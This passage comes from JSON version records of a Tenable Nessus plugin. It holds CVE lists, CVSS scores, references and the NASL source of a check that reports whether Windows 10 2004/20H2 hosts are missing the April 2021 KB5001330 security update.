\"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-13T23:39:28", "differentElements": ["nessusSeverity"], "edition": 10}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "f5fe9bd98b542b405cce744c20850762", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-08-19T12:02:46", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001337.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-28446", "CVE-2021-26416", "CVE-2021-28324", "CVE-2021-28436", "CVE-2021-28314", "CVE-2021-27092", "CVE-2021-28438", "CVE-2021-27088", "CVE-2021-27090", "CVE-2021-27079"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-26415/", "MSF:ILITIES/MSFT-CVE-2021-26413/"]}, {"type": "mskb", "idList": ["KB5001330"]}], "modified": "2021-08-19T12:02:46", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-19T12:02:46", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T12:02:46", "differentElements": ["vpr"], "edition": 11}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "1aa14f02803ce041d08608598281494b", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", 